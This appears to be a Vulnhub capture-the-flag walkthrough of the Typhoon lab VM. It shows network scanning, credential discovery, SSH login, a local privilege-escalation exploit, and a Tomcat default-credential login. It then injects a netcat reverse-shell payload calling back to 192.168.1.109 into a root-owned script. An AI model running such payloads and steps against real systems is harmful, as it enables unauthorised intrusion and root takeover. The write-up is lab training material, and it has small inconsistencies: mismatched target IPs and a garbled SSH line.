E Exploits

Typhoon: Vulnhub Walkthrough

Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.

Flag: root-flag

Since there are multiple ways in which we can exploit this machine. Therefore we have used two methods to capture the flag as follows:

Method 1- Using a LOCAL PRIVILEGE ESCALATION SHELL after logging into SSH.

Let’s Begin with the Walkthrough!!

Let’s start off with scanning the network to find our targets IP.

netdiscover

image

We found our target IP –> 192.168.1.105

Our next motive is to scan the target IP with nmap.

nmap -A 192.168.1.101

The NMAP output shows various open ports: 21(ftp), 22(ssh), 25(smtp), 53(domain), 80(http), 110(pop3), 111(rpcbind), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 631(ipp), 993(ssl/imaps), 995(ssl/pop3), 2049(nfs_acl), 3306(mysql), 5432(postgrespl), 8080(http).

Further we notice that there is a entry /monoadmin/ in robot.txt as it might be useful.

image

We also noticed that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. This could be another way of exploiting this machine. But will see to it later on.

image

Moving on, Since port 80 is also open. So, we browsed the found directory /mongoadmin/ into the browser. The result displayed is shown in the image. Here we set change database to credentials(84mb). It will display a link of 2 Credentials. Click on it.

image

Clicking on the 2 Credential link will give us 2 Credentials [username]:typhoon and [password]:789456123 . These credentials might be a great help for further enumeration.

image

After a sometime, we just strike with a idea WHY NOT USE THE FOUND CREDS TO LOGIN WITH SSH?. Since SSH port 22 is also open.

Than we simply logged in SSH with CREDENTIALS Username:typhoon & Password: 789456123

ssh Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.

Then we checked system information and found out Ubuntu 14.04 is running on target machine. Good thing we were familiar with an exploit for Ubuntu 14.04.

image

Next we look for an exploit for ubuntu 14.04 using searchsploit. The exploit we have used have highlighted, after that we have copied the exploit 37292.c in the /root/ directory. Executing a Python server to download the file in the target machine.

image

Afterwards we have downloaded our exploit 37292.c in the /tmp directory. After compilation and granting permissions to the exploit. We have executed it.

Booyeah!! We have got the root access and found our FLAG. We take a look at the content of the file and greeted with a congratulatory message.  

image

Method 2

Using Tomcat Manager Upload to get the meterpreter and then further establishing a reverse connection to get root access.

Let’s Begin with the Walkthrough!!

Since in Method-1 port scanning, we notice that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. So let’s browse the Target IP on port 8080 on the browser.

image

We are very fimiliar with Tomcat Server Login using manager webapp due to our previous lab experiences. Without wasting time we straight away logged into Tomcat Server using Metasploits Tomcat Manager using the Default credentials for Tomcat Server Login.

[username]:tomcat
[password]:tomcat

Oh Yeah! We have got the meterpreter. After spending a lot of time of enumeration, we found a directory /tab which consist of file script.sh that was owned by root and has FULL Permission. So we thought of inserting a malicious code in script.sh.

image

 Moving on!! We need to create a bash code using Msfvenom:

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R

After that, append the above generated malicious code in the script.sh file.

image

echo "mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0</tmp/vvwjo | /bin/sh >/tmp/vvwjo 2>&1; rm /tmp/vvwjo" > script.sh

image

Since the malicious code got executed with the script.sh file. Therefore we got a reverse shell on our netcat listener.

Yeah!! We have got the root access and found root-flag. We take a look at the content of the file and greeted with a congratulatory message.

image

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

The post Typhoon: Vulnhub Walkthrough appeared first on Hacking Articles.

Read more